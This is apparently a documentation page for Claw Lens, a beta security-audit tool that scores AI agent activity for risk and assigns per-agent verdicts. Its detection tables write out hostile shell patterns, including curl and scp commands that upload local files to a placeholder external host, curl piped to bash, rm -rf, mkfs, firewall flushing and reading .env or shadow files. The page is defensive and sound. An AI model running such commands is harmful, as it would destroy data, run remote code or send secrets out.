Risk Scoring - Claw Lens

Security Audit is a beta feature. Detection coverage and UI are evolving — feedback is welcome.

Every audit event receives a risk score from 0 to 3. The score determines the event’s risk level — high, medium, or low — and feeds into the per-agent verdict. This page explains what triggers each level, what the risk flags mean, and how agent verdicts are assigned.

Risk levels

High

Score = 3. Confirmed damage or an active attack. Act immediately.

Medium

Score = 2. Confirmed exposure, no confirmed damage yet. Review soon.

Low

Score = 1. Behavioral anomaly or pattern worth noting. Review periodically.

High risk triggers

An event is scored high (3) when any of the following flags are set: exfil_pattern — A shell command explicitly sent local file content to an external URL. The data has already left the machine. Patterns that trigger this flag:

curl -F file=@/path/to/file https://external.example.com
curl --data-binary @/path/to/file https://external.example.com
curl --upload-file /path/to/file https://external.example.com
cat /path/to/file | curl -X POST -d @- https://external.example.com
scp /local/file user@remote:/path

critical_cmd — A destructive or system-altering shell command was executed. Commands in this category:

Pattern	Risk
`rm -rf`	Recursive forced deletion
`curl/wget	bash`or`curl/wget	sh`	Remote code execution
`chmod +s`	Sets the SUID bit
`chmod 777`	World-writable permissions
`dd if=... of=/dev/...`	Direct disk write
`iptables -F`	Flushes the firewall
`mkfs`	Formats a filesystem
`echo ... > /etc/`	Writes to system configuration

prompt_injection — An injection pattern was detected in agent input. All prompt injection findings are scored high regardless of other context. See Audit Rules for the full pattern list. Confirmed credential exfiltration — A credential was found in agent output and the same session subsequently made an external network call. Claw Lens correlates these two events and flags the finding as a potential exfiltration path.

Medium risk triggers

An event is scored medium (2) when any of the following flags are set: sensitive_data — A credential, API key, token, password, or private key appeared in tool output. The secret was exposed in the agent’s context but has not been confirmed as sent externally. See Credential Inventory for the full list of detected patterns. elevated_cmd — A high-privilege shell command was executed. Commands in this category:

Pattern	Examples
`sudo`	Any sudo invocation
`ssh` / `scp` / `rsync`	Remote connections and transfers
`curl` / `wget`	Any outbound HTTP request in a shell
`nc` / `netcat` / `ftp`	Raw network connections
`cat .env` / `cat passwd` / `cat shadow`	Reading credential files via shell
`chown root`	Changing ownership to root

new_domain — The agent contacted a domain that does not appear in its baseline history. Domains are tracked per agent; a domain moves from “new” to “known” once it appears in 30 days of baseline data. sensitive_path_medium — The agent accessed a path matching a medium-severity sensitive path rule (e.g., **/id_rsa, **/.env, **/Library/Keychains/**). See Audit Rules for the full path rule table.

Low risk triggers

An event is scored low (1) when any of the following flags are set: sensitive_path — The agent accessed a path matching a low-severity sensitive path rule (e.g., **/.ssh/**, **/*.env, **/*token*) without a credential being found in the output. anomaly_hour — The agent was active at an hour outside its typical active hours as recorded in the baseline. anomaly_volume — The session’s total tool call count exceeded three times the agent’s average tool calls per session. anomaly_path — The agent accessed a filesystem directory it has not accessed in the baseline period.

Risk flags reference

All flags that can appear on an event:

Flag	Level	Trigger
`exfil_pattern`	High	Shell command uploads file content to external URL
`critical_cmd`	High	Destructive shell command (`rm -rf`, `mkfs`, etc.)
`prompt_injection`	High	Injection pattern detected in agent input
`sensitive_data`	Medium	Credential or secret found in tool output
`elevated_cmd`	Medium	Privileged command (`sudo`, `ssh`, `curl`, etc.)
`new_domain`	Medium	External call to a domain not in baseline
`sensitive_path_medium`	Medium	Access to a medium-severity sensitive path
`sensitive_path`	Low	Access to a low-severity sensitive path
`anomaly_hour`	Low	Activity outside typical hours
`anomaly_volume`	Low	Session tool call count > 3× baseline average
`anomaly_path`	Low	Access to a directory not in baseline

Anomaly detection and baselines

Low-risk anomaly flags are relative to each agent’s individual baseline. The baseline is built from the agent’s last 30 days of activity and captures:

typical_hours — the 12 most active hours of day
avg_tool_calls_per_session — the mean number of tool calls across all sessions
typical_paths — the 20 most-accessed filesystem directories
known_domains — all external domains the agent has contacted

When an event deviates from the baseline on any of these dimensions, the corresponding anomaly flag is set. Baselines are rebuilt automatically as new sessions come in, so a new domain or new path eventually becomes part of the baseline if the agent accesses it consistently.

Anomaly flags are only set when a baseline exists. A new agent with no history will not trigger anomaly flags until enough sessions have been recorded to build one.

Agent Risk Level

The Agent Security tab assigns each agent one of three verdicts based on its active (non-dismissed) findings:

Verdict	Meaning
`safe`	No active findings
`caution`	Has medium or low severity active findings
`unsafe`	Has high severity findings, or any active prompt injection finding

Agent Risk Level are driven by the severity of the underlying findings, not raw event counts. Dismissing a finding updates the risk level — if the last high-severity finding on an agent is dismissed, the verdict may drop from unsafe to caution or safe.

Documentation Index

​Risk levels

High

Medium

Low

​High risk triggers

​Medium risk triggers

​Low risk triggers

​Risk flags reference

​Anomaly detection and baselines

​Agent Risk Level

Risk levels

High risk triggers

Medium risk triggers

Low risk triggers

Risk flags reference

Anomaly detection and baselines

Agent Risk Level